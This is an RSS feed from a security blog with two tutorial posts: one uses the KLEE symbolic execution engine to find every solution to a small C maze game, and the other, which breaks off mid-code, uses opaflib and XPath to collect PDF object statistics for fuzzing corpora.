<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Feliam&#039;s Blog</title>
	<atom:link href="http://feliam.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://feliam.wordpress.com</link>
	<description>Security stuff..</description>
	<lastBuildDate>Wed, 20 Feb 2013 19:23:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='feliam.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://1.gravatar.com/blavatar/32b1e454fda92ddec4c2b6780b8f20d2?s=96&#038;d=http%3A%2F%2Fs2.wp.com%2Fi%2Fbuttonw-com.png</url>
		<title>Feliam&#039;s Blog</title>
		<link>http://feliam.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://feliam.wordpress.com/osd.xml" title="Feliam&#039;s Blog" />
	<atom:link rel='hub' href='http://feliam.wordpress.com/?pushpress=hub'/>
		<item>
		<title>The Symbolic Maze!</title>
		<link>http://feliam.wordpress.com/2010/10/07/the-symbolic-maze/</link>
		<comments>http://feliam.wordpress.com/2010/10/07/the-symbolic-maze/#comments</comments>
		<pubDate>Thu, 07 Oct 2010 18:07:50 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[symbolic execution]]></category>
		<category><![CDATA[ascii]]></category>
		<category><![CDATA[game]]></category>
		<category><![CDATA[klee]]></category>
		<category><![CDATA[llvm]]></category>
		<category><![CDATA[maze]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=554</guid>
		<description><![CDATA[In this post we&#8217;ll exercise the symbolic execution engine KLEE over a funny ASCII Maze (yet another toy example)! VS. Maze dimensions: 11x7 Player pos: 1x1 Iteration no. 0 Program the player moves with a sequence of 'w', 's', 'a' or 'd' Try to reach the prize(#)! +-+---+---+ &#124;X&#124; &#124;#&#124; &#124; &#124; --+ &#124; &#124; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=554&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[
<p>In this post we&#8217;ll exercise the symbolic execution engine KLEE over a funny ASCII Maze (yet another toy example)!</p>
<table>
<tbody>
<tr>
<td><a href="http://en.wikipedia.org/wiki/Low_Level_Virtual_Machine"><img class="alignnone" src="http://patrick.ripp.eu/wp-content/uploads/2009/07/DragonFull.png" alt="LLVM" width="200" height="200" /></a></td>
<td>
<h1><strong>VS.</strong></h1>
</td>
<td>
<pre style="font-size:small;">
Maze dimensions: 11x7
Player pos: 1x1 Iteration no. 0
Program the player moves with
a sequence of 'w', 's', 'a' or 'd'
Try to reach the prize(#)!
           +-+---+---+
           |X|     |#|
           | | --+ | |
           | |   | | |
           | +-- | | |
           |     |   |
           +-----+---+
</pre>
</td>
</tr>
</tbody>
</table>
<p>The match is between a tiny maze-like game coded in C and the full-fledged, LLVM-based symbolic execution engine <a href="http://klee.llvm.org/Documentation.html">KLEE</a>.</p>
<p style="text-align:center;"><em>How many solutions do you think it has?</em></p>
<h1>The Maze</h1>
<p>The game is coded in C, and the impatient can download it from <a href="http://pastebin.com/6wG5stht">here</a>. This simple ASCII game first asks you to feed it directions, entered as one batch of actions. As &#8220;usual&#8221;: a is Left, d is Right, w is Up and s is Down. It looks like this&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">
<pre>Player pos: 1x4
Iteration no. 2. Action: s.
+-+---+---+
|X|     |#|
|X| --+ | |
|X|   | | |
|X+-- | | |
|     |   |
+-----+---+</pre>
</div>
<p>It&#8217;s really small, I know! But the code hides a nasty trick and, as you&#8217;ll see at the end, there is more than one way to solve it.</p>
<h1>The KLEE</h1>
<p>KLEE is a symbolic interpreter of LLVM bitcode: it symbolically runs code that has been compiled to LLVM. That means running a program while treating its input (or some other variables) as symbols instead of concrete values like 100 or &#8220;cacho&#8221;. In very few words, symbolic execution runs through the code propagating symbols and conditions, forking execution at symbol-dependent branches and asking the companion SMT solver for path feasibility or counter-examples. For more info check out <a href="http://klee.llvm.org/">this</a>, <a href="http://llvm.org/pubs/2008-12-OSDI-KLEE.pdf">this</a> or even <a href="http://www.ece.cmu.edu/~ejschwar/papers/oakland10.pdf">this</a>.</p>
<p>Find it interesting? Keep reading!<br />
<span id="more-554"></span></p>
<h1>The idea</h1>
<p>Use KLEE to automatically solve our small puzzle.</p>
<h1>Dissecting the code</h1>
<p>Let&#8217;s take a walk through the maze code. First, it hardcodes the map as a global, writable variable.</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>#define H 7
#define W 11
char maze[H][W] = { "+-+---+---+",
                    "| |     |#|",
                    "| | --+ | |",
                    "| |   | | |",
                    "| +-- | | |",
                    "|     |   |",
                    "+-----+---+" };</pre>
</div>
<p>It sets up a convenient function to draw the maze state on the screen&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>void draw ()
{
	int i, j;
	for (i = 0; i &lt; H; i++)
	  {
		  for (j = 0; j &lt; W; j++)
				  printf ("%c", maze[i][j]);
		  printf ("\n");
	  }
	printf ("\n");
}</pre>
</div>
<p>In the main function there are local variables to hold the position of the &#8220;player&#8221;, the iteration counter, and a 28-byte array of actions&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>int
main (int argc, char *argv[])
{
    int x, y;     //Player position
    int ox, oy;   //Old player position
    int i = 0;    //Iteration number
    #define ITERS 28
    char program[ITERS];</pre>
</div>
<p>The initial player position is set to (1,1), the first free cell in the map. And the player &#8216;sprite&#8217; is the letter &#8216;X&#8217; &#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>    x = 1;
    y = 1;
    maze[y][x]='X';</pre>
</div>
<p>At this point we are ready to start! So it asks for directions. It reads all actions at once as an array of chars. It will execute up to ITERS iterations or commands.</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>    read(0,program,ITERS);</pre>
</div>
<p>Now it iterates over the  array of actions in variable &#8216;program&#8217;&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>    while(i &lt; ITERS)
      {
        ox = x;    //Save old player position
        oy = y;
</pre>
</div>
<p>Each action moves the player one step along one of the two axes. As &#8220;usual&#8221;: a is Left, d is Right, w is Up and s is Down.</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>        switch (program[i])
        {
            case 'w':
                        y--;
                break;
            case 's':
                        y++;
                break;
            case 'a':
                        x--;
                break;
            case 'd':
                        x++;
                break;
            default:
                        printf("Wrong command!(only w,s,a,d accepted!)\n");
                        printf("You lose!\n");
                        exit(-1);
        }</pre>
</div>
<p>It checks whether the prize has been hit. If so&#8230; you win!</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>        if (maze[y][x] == '#')
        {
                printf ("You win!\n");
                printf ("Your solution %.*s\n", ITERS, program);  //program is not NUL-terminated
                exit (1);
        }</pre>
</div>
<p>If something is wrong, do not advance: backtrack to the saved position!</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>        if (maze[y][x] != ' ' &amp;&amp;
            !((y == 2 &amp;&amp; maze[y][x] == '|' &amp;&amp; x &gt; 0 &amp;&amp; x &lt; W)))
		    {
			    x = ox;
			    y = oy;
		    }</pre>
</div>
<p>If you crashed into a wall or couldn&#8217;t move, exit: you lose!</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>        if (ox==x &amp;&amp; oy==y){
                printf("You lose\n");
                exit(-2);
        }</pre>
</div>
<p>Ok, basically if we can move.. we move! Put the player in the correct position in the map. And draw the new state.</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>        maze[y][x]='X';
        draw ();          //draw it</pre>
</div>
<p>Increment the iteration counter (used to select next action in the array), wait a second and loop.</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>        i++;
        sleep(1); //me wait to human
    }</pre>
</div>
<p>If you haven&#8217;t won so far.. you lose.</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>printf("You lose\n");
}</pre>
</div>
<p>Ok, that&#8217;s all of it.</p>
<h1>By hand&#8230;</h1>
<p>Now, assuming you have it in maze.c, it should compile with a line like this:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">gcc maze.c -o maze</div>
<p style="text-align:left;">Run it! In a couple of tries you&#8217;ll get to the priceless &#8216;#&#8217;. Maybe using this solution:</p>
<p style="text-align:center;"><strong>ssssddddwwaawwddddssssddwwww</strong></p>
<p>Here you have a screencast of me winning! Vivaaaa!!<br />
<a href="http://feliam.files.wordpress.com/2010/10/maze3.gif"><img class="aligncenter size-full wp-image-590" title="maze" src="http://feliam.files.wordpress.com/2010/10/maze3.gif?w=460" alt=""   /></a></p>
<h1>By KLEE</h1>
<p>Let&#8217;s see if KLEE is able to find the solution. Before we can even start thinking about KLEE, we need a copy of the LLVM toolchain and to compile our maze to LLVM bitcode. Here we have used LLVM 2.7 and llvm-gcc. You may want to take a tour of KLEE&#8217;s official tutorials <a href="http://klee.llvm.org/Tutorial-1.html">here</a>. Once you have the LLVM thing in place, a compile-and-test cycle for maze.c using LLVM looks like this&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">llvm-gcc -c --emit-llvm maze.c -o maze.bc<br />
lli maze.bc</div>
<p>That will run the LLVM bitcode representation of our maze in the interpreter. But to test it with KLEE we need to mark something in the code as symbolic. Let&#8217;s mark all maze inputs as symbolic, that is, the array of actions the maze code reads at the very beginning of the main function. KLEE will gain &#8216;symbolic control&#8217; over the array of actions. In code, that&#8217;s done by replacing this line&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>    read(0,program,ITERS);</pre>
</div>
<p>&#8230; with &#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>    klee_make_symbolic(program,ITERS,"program");</pre>
</div>
<p>You will also need to add the KLEE header at the beginning of the code&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>#include &lt;klee/klee.h&gt;</pre>
</div>
<p>Now KLEE will find every possible code/maze path reachable from any input. If some of those paths lead to a typical error condition like a memory failure or such, KLEE will signal it! </p>
<div style="border:1px solid gray;margin:10px;padding:10px;">
<strong>Symbolic execution, the chamigo way:</strong><br />
- Say.. every input is marked as a symbol.<br />
- Not a concrete value like 1 or &#8220;cacho&#8221;, but a symbolic variable representing every possible value.<br />
- Then the program evolves&#8230; adding restrictions to these symbols.<br />
- At some point it may face a branch that depends on such symbols.<br />
- In that case it checks the feasibility of the different paths using an SMT solver.<br />
- If feasible, it dives into each path, repeating this basic algorithm.<br />
- Of course, if an error condition is reached, the SMT solver is asked for an input that reaches that specific spot.
</div>
<p>Hello, is mr. memory corruption here?! Let&#8217;s give it a try&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">llvm-gcc -c -Ipath/to/klee --emit-llvm maze_klee.c -o maze_klee.bc<br />
klee maze_klee.bc</div>
<p>Here is the screencast of a run&#8230;<br />
<a href="http://feliam.files.wordpress.com/2010/10/maze_klee.gif"><img class="aligncenter size-full wp-image-611" title="maze_klee" src="http://feliam.files.wordpress.com/2010/10/maze_klee.gif?w=460" alt=""   /></a><br />
As you can see at the end of the demo, KLEE finds 321 different paths&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">KLEE: done: total instructions = 112773<br />
KLEE: done: completed paths = 321<br />
KLEE: done: generated tests = 318</div>
<p>&#8230; and it writes the generated test cases to the klee-last folder&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">$ls klee-last/<br />
assembly.ll       test000078.ktest       test000158.ktest<br />
info              test000079.ktest       test000159.ktest<br />
messages.txt      test000080.ktest       test000160.ktest<br />
run.istats        test000081.ktest       test000161.ktest<br />
run.stats         test000082.ktest       test000162.ktest<br />
test000001.ktest  test000083.ktest       test000163.ktest<br />
test000075.ktest  test000155.ktest         warnings.txt</div>
<p>Each test case can be inspected with ktest-tool like this&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">$ktest-tool klee-last/test000222.ktest<br />
ktest file : 'klee-last/test000222.ktest'<br />
args       : ['maze_klee.o']<br />
num objects: 1<br />
object    0: name: 'program'<br />
object    0: size: 29<br />
object    0: data: 'ssssddddwwaawwddddssssddwwwd\x00'</div>
<p>So in this case you may take that input to the original maze and check what it does.</p>
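<p>If you want to pull the moves out of that output from a script, a small parser is enough. This is a sketch that assumes the text layout shown above, with plain straight quotes as a terminal prints them; other KLEE versions may print the data differently, and the function name moves_from_ktest_text is made up here.</p>

```python
import re

# Text as printed by the ktest-tool run above (raw string keeps the \x00 escapes literal).
SAMPLE = r"""ktest file : 'klee-last/test000222.ktest'
args       : ['maze_klee.o']
num objects: 1
object    0: name: 'program'
object    0: size: 29
object    0: data: 'ssssddddwwaawwddddssssddwwwd\x00'"""

# Matches a line such as:  object    0: data: '...'
DATA_LINE = re.compile(r"^object\s+\d+: data: '(.*)'$", re.MULTILINE)


def moves_from_ktest_text(text):
    """Return the move string of the first object, without trailing \\x00 padding."""
    match = DATA_LINE.search(text)
    if match is None:
        raise ValueError("no 'data' line found")
    # Drop the literal "\x00" escape sequences that pad the end of the buffer.
    return re.sub(r"(\\x00)+$", "", match.group(1))


print(moves_from_ktest_text(SAMPLE))
```

<p>The returned string can then be piped into the original maze binary to see what that test case does.</p>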
<p>OK, so far so good, but I&#8217;m not going to ktest-tool every possible test case and check whether it is a maze solution! We need a way for KLEE to help us tell the normal test cases apart from the ones that actually reach the &#8220;You win!&#8221; state.<br />
Note also that KLEE hasn&#8217;t found any error in the maze code. By design, KLEE will issue a warning when any &#8220;well known&#8221; error condition (like a wrongly indexed memory access) is detected.</p>
<h4>How to flag the portion of code we are interested in?</h4>
<p>There is a klee_assert() function that does pretty much the same thing as a common C assert: it requires a condition to be true, otherwise it aborts execution! You can check out the complete KLEE C interface <a href="https://llvm.org/svn/llvm-project/klee/trunk/include/klee/klee.h">here</a>. That gives us what we need&#8230; a way to mark a certain part of the program (with an assert) so KLEE will scream when it reaches it.</p>
<p>In the code, that&#8217;s done by replacing this line &#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>printf ("You win!\n");</pre>
</div>
<p>&#8230; with these two &#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>printf ("You win!\n");
klee_assert(0);  //Signal The solution!!</pre>
</div>
<p>Now KLEE will assert a synthetic failure when it reaches the &#8220;You win!&#8221; state (that is, the &#8216;player&#8217; hits the &#8216;#&#8217;). If you compile it to LLVM and run KLEE on the new version, it flags one test case as also being an error&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">$ls -1 klee-last/ |grep -A2 -B2 err<br />
test000096.ktest<br />
test000097.ktest<br />
test000098.assert.err<br />
test000098.ktest<br />
test000098.pc</div>
<p>Let&#8217;s see which input triggers this error/maze solution&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">$ktest-tool klee-last/test000098.ktest<br />
ktest file : 'klee-last/test000098.ktest'<br />
args       : ['maze_klee.o']<br />
num objects: 1<br />
object    0: name: 'program'<br />
object    0: size: 29<br />
object    0: data: 'sddwddddssssddwwww\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
</div>
<p>So it proposes the solution&#8230;</p>
<p><strong>sddwddddssssddwwww</strong></p>
<p>HEY! That&#8217;s odd, it seems too short to even reach the other end of the maze! Let&#8217;s try that input on the original maze&#8230;</p>
<p><a href="http://feliam.files.wordpress.com/2010/10/maze_klee_fakewall.gif"><img class="aligncenter size-full wp-image-619" title="maze_klee_fakewall" src="http://feliam.files.wordpress.com/2010/10/maze_klee_fakewall.gif?w=460" alt=""   /></a></p>
<p>Typical!! There are fake walls! And KLEE made its way through them! Excellent! But wait a minute, isn&#8217;t it supposed to find every possible solution? Where is our trivial solution? Why was KLEE unable to find it?</p>
<p>Well, in most cases (apparently) you need only one way to reach an error condition, so KLEE won&#8217;t show you the other ways to reach the same error state. We desperately need to use one of the 10000 KLEE <a href="http://pastebin.com/tDPGNn9D">options</a>. We need to run it like this..</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">$klee --emit-all-errors maze_klee.o</div>
<p>Check out the KLEE crazy run&#8230;</p>
<p><a href="http://feliam.files.wordpress.com/2010/10/maze_klee_allerrors.gif"><img class="aligncenter size-full wp-image-618" title="maze_klee_allerrors" src="http://feliam.files.wordpress.com/2010/10/maze_klee_allerrors.gif?w=460" alt=""   /></a></p>
<p>Now it gives 4 different &#8220;solutions&#8221;&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">$ktest-tool klee-last/test000097.ktest<br />
ktest file : 'klee-last/test000097.ktest'<br />
args       : ['maze_klee.o']<br />
num objects: 1<br />
object    0: name: 'program'<br />
object    0: size: 29<br />
object    0: data: 'sddwddddsddw\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'<br />
$ktest-tool klee-last/test000136.ktest<br />
ktest file : 'klee-last/test000136.ktest'<br />
args       : ['maze_klee.o']<br />
num objects: 1<br />
object    0: name: 'program'<br />
object    0: size: 29<br />
object    0: data: 'sddwddddssssddwwww\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'<br />
$ktest-tool klee-last/test000239.ktest<br />
ktest file : 'klee-last/test000239.ktest'<br />
args       : ['maze_klee.o']<br />
num objects: 1<br />
object    0: name: 'program'<br />
object    0: size: 29<br />
object    0: data: 'ssssddddwwaawwddddsddw\x00\x00\x00\x00\x00\x00\x00'<br />
$ktest-tool klee-last/test000268.ktest<br />
ktest file : 'klee-last/test000268.ktest'<br />
args       : ['maze_klee.o']<br />
num objects: 1<br />
object    0: name: 'program'<br />
object    0: size: 29<br />
object    0: data: 'ssssddddwwaawwddddssssddwwww\x00'</div>
<p>There are 4 possible solutions!!</p>
<blockquote>
<ol>
<li><strong>ssssddddwwaawwddddssssddwwww</strong></li>
<li><strong>ssssddddwwaawwddddsddw</strong></li>
<li><strong>sddwddddssssddwwww</strong></li>
<li><strong>sddwddddsddw</strong></li>
</ol>
</blockquote>
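<p>As a cross-check, the same list can be reproduced with a plain depth-first search over a Python model of the maze rules. This is an ad-hoc sketch, not part of the original experiment: the helper names are invented, visited cells are tracked in a set instead of writing &#8216;X&#8217; into the map, and stepping outside a row is simply treated as blocked.</p>

```python
MAZE = [
    "+-+---+---+",
    "| |     |#|",
    "| | --+ | |",
    "| |   | | |",
    "| +-- | | |",
    "|     |   |",
    "+-----+---+",
]
W = 11       # maze width, as in the C code
ITERS = 28   # maximum number of moves, as in the C code
MOVES = {"w": (0, -1), "s": (0, 1), "a": (-1, 0), "d": (1, 0)}


def passable(x, y):
    """Mirror of the C check: free cells, plus '|' cells on row 2 (the fake walls)."""
    if not 0 <= x < W:
        return False  # modelling choice: leaving the row counts as blocked
    cell = MAZE[y][x]
    return cell == " " or (y == 2 and cell == "|" and 0 < x < W)


def solutions(x=1, y=1, visited=None, path=""):
    """Yield every move sequence of at most ITERS moves that reaches '#'."""
    visited = visited or {(1, 1)}
    if len(path) == ITERS:
        return
    for key, (dx, dy) in MOVES.items():
        nx, ny = x + dx, y + dy
        if 0 <= nx < W and MAZE[ny][nx] == "#":
            yield path + key
        elif passable(nx, ny) and (nx, ny) not in visited:
            # Visited cells hold an 'X' in the C version, so they cannot be re-entered.
            yield from solutions(nx, ny, visited | {(nx, ny)}, path + key)


for moves in sorted(solutions(), key=len):
    print(len(moves), moves)
```

<p>Under this model the search returns the same four sequences that KLEE reported, with lengths 12, 18, 22 and 28.</p>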
<h1>Conclusion</h1>
<p>Symbolic execution beats manual code exploration, and even coding an error-prone ad-hoc solution searcher. Fuzzing for it may be infeasible here, even when restricting the input to the interesting characters&#8230; but I&#8217;m not sure.</p>
<p>Comments and corrections are very welcome!!</p>
<p>f/</p>
]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/10/07/the-symbolic-maze/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/09/t_small-b.png" medium="image">
			<media:title type="html">Follow feliam on Twitter</media:title>
		</media:content>

		<media:content url="http://patrick.ripp.eu/wp-content/uploads/2009/07/DragonFull.png" medium="image">
			<media:title type="html">LLVM</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/10/maze3.gif" medium="image">
			<media:title type="html">maze</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/10/maze_klee.gif" medium="image">
			<media:title type="html">maze_klee</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/10/maze_klee_fakewall.gif" medium="image">
			<media:title type="html">maze_klee_fakewall</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/10/maze_klee_allerrors.gif" medium="image">
			<media:title type="html">maze_klee_allerrors</media:title>
		</media:content>
	</item>
		<item>
		<title>PDF stats</title>
		<link>http://feliam.wordpress.com/2010/08/26/pdf-stats/</link>
		<comments>http://feliam.wordpress.com/2010/08/26/pdf-stats/#comments</comments>
		<pubDate>Thu, 26 Aug 2010 04:41:56 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[fuzzing]]></category>
		<category><![CDATA[parser]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=486</guid>
		<description><![CDATA[This is an example use of the opaflib. The script described here use opaflib to get some statistics about the different PDF objects that appear in you file stash. This 2 charts show the appearing frequencies of Filters and Object types in a 10Mbyte small database of a random pdf selection. So it is better [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=486&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[
<p>This is an example use of opaflib. The script described here uses <a href="http://code.google.com/p/opaf/">opaflib</a> to get some statistics about the different PDF objects that appear in your file stash. These two charts show the frequencies of Filters and Object types in a small 10Mbyte database of randomly selected PDFs.<br />
<a href="http://feliam.files.wordpress.com/2010/08/filtersfrq.png"><img class="aligncenter size-medium wp-image-511" title="filtersfrq" src="http://feliam.files.wordpress.com/2010/08/filtersfrq.png?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p><a href="http://feliam.files.wordpress.com/2010/08/frequencies.png"><img class="aligncenter size-medium wp-image-508" title="frequencies" src="http://feliam.files.wordpress.com/2010/08/frequencies.png?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p>For your fuzzing base it is better that these numbers look even; otherwise you&#8217;ll be testing the same thing over and over.</p>
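<p>One way to put a number on &#8220;even&#8221; is the normalized Shannon entropy of the counts: 1.0 means every category appears equally often, and values near 0 mean one category dominates. This measure is my own suggestion rather than something opaflib provides, and the function name evenness is made up; the filter counts below are copied from the sample run at the end of this post.</p>

```python
from math import log2


def evenness(freqs):
    """Normalized Shannon entropy of a {category: count} mapping, in [0, 1]."""
    total = sum(freqs.values())
    probs = [count / total for count in freqs.values() if count > 0]
    if len(probs) < 2:
        return 1.0  # a single category is trivially "even"
    entropy = -sum(p * log2(p) for p in probs)
    return entropy / log2(len(probs))  # divide by the maximum possible entropy


# Filter frequencies from the sample output shown later in the post.
filters = {
    "A85": 1,
    "ASCII85Decode": 163,
    "CCITTFaxDecode": 128,
    "JBIG2Decode": 2,
    "LZWDecode": 559,
    "FlateDecode": 9075,
    "DCTDecode": 608,
    "JPXDecode": 3,
}

print("filter evenness: %.2f" % evenness(filters))
```

<p>A low score here would reflect how heavily FlateDecode dominates that sample, which is exactly the kind of imbalance to watch for in a fuzzing corpus.</p>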
<p>Keep reading for more exciting details!!! WEEEEEEEEEEEE!<br />
<span id="more-486"></span><br />
OK, let&#8217;s go step by step through the Python script that does this. First, import the OPAF! (beta) library (get it or contribute <a href="http://code.google.com/p/opaf/">here</a>).</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>import sys
from opaflib import *</pre>
</div>
<p>Initialize the counters&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>types,filters = {} , {}
bytes, iobjects, streams, fstreams, cobjects = [], [], [], [], []</pre>
</div>
<p>Read the PDF from stdin and parse it using the normal parser from OPAF!&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>pdf = sys.stdin.read()   # keep the raw bytes; their length is reported below
xml_pdf = normalParser(pdf)</pre>
</div>
<p>Find, expand and parse every ObjStm &#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>for objstm in xml_pdf.xpath(
                      '//indirect_object_stream/dictionary/'+
                      'dictionary_entry/name[@payload=enc("Type")]'+
                      '/following-sibling::*[@payload=enc("ObjStm")]'+
                      '/../../..'):
    expand(objstm)
    expandObjStm(objstm)</pre>
</div>
<p>WOAH! What&#8217;s that??<br />
That&#8217;s XPath; for some reason XML people love it. It applies conditions to the XML nodes, which eventually selects exactly the set of nodes you want. Let&#8217;s dissect the XPath for getting all streams with compressed objects.<br />
We need any appearing object stream &#8230;</p>
<div style="border:1px solid black;color:#ff0032;margin:10px;padding:10px;">
<pre>  //indirect_object_stream</pre>
</div>
<p>&#8230; that has a dictionary &#8230;.</p>
<div style="border:1px solid black;color:#ff0032;margin:10px;padding:10px;">
<pre>  /dictionary</pre>
</div>
<p>&#8230; with at least one dictionary entry&#8230;</p>
<div style="border:1px solid black;color:#ff0032;margin:10px;padding:10px;">
<pre>  /dictionary_entry</pre>
</div>
<p>&#8230; with a key named &#8220;Type&#8221; &#8230;</p>
<div style="border:1px solid black;color:#ff0032;margin:10px;padding:10px;">
<pre>   /name[@payload=enc("Type") ...]</pre>
</div>
<p>&#8230; which is followed by a value ObjStm.</p>
<div style="border:1px solid black;color:#ff0032;margin:10px;padding:10px;">
<pre>  /following-sibling::*[@payload=enc("ObjStm")]</pre>
</div>
<p>That way we select exactly any &#8216;ObjStm&#8217; value of a key named &#8216;Type&#8217; inside a dictionary entry in a dictionary in an indirect object. We backtrack a little to select the indirect object stream itself&#8230;</p>
<div style="border:1px solid black;color:#ff0032;margin:10px;padding:10px;">
<pre>   /../../..</pre>
</div>
<p>and that&#8217;s it. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  The XPath thing.</p>
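<p>To see the same selection without opaflib, here is a sketch using only Python&#8217;s standard xml.etree.ElementTree. It rests on several assumptions: the tiny tree below is invented and only borrows the element names from the XPath above, payloads are stored as plain text instead of going through enc(), and, because ElementTree supports only a subset of XPath (no following-sibling axis), the sibling test is done in Python.</p>

```python
import xml.etree.ElementTree as ET


def add_entry(dictionary, key, value):
    """Append a <dictionary_entry> holding a key name and a value name."""
    entry = ET.SubElement(dictionary, "dictionary_entry")
    ET.SubElement(entry, "name", payload=key)
    ET.SubElement(entry, "name", payload=value)


# Hypothetical document: stream 1 is an object stream, stream 2 is not.
root = ET.Element("pdf")
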